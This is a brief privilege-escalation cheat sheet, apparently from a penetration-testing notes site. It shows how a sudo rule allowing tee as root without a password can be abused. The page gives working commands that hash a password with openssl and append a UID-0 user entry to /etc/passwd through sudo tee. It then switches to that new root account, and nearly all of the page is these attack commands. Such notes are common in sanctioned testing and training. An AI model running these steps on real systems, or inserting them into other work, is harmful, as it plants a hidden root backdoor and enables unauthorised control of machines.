Sudo Tee Privilege Escalation
Sudo tee command is vulnerable to privilege escalation.
(root) NOPASSWD: /usr/bin/tee
Copied!
If we can execute tee
command as root, we can escalate to privilege.
Assume the new username is "tester".
# -1: MD5 algorithm
# -salt: Use privided salt -> The new username here
openssl passwd -1 -salt "tester" "password123"
# Output: $1$tester$LvsygQ2GEt7VUJQEqhMLf/
Copied!
Copy the output password.
Paste the password in printf
and overwrite /etc/passwd
using tee
command.
printf 'tester:$1$tester$LvsygQ2GEt7VUJQEqhMLf/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwd
Copied!
Now the new user was created. We can switch to the new user.
su tester
password: password123
Last updated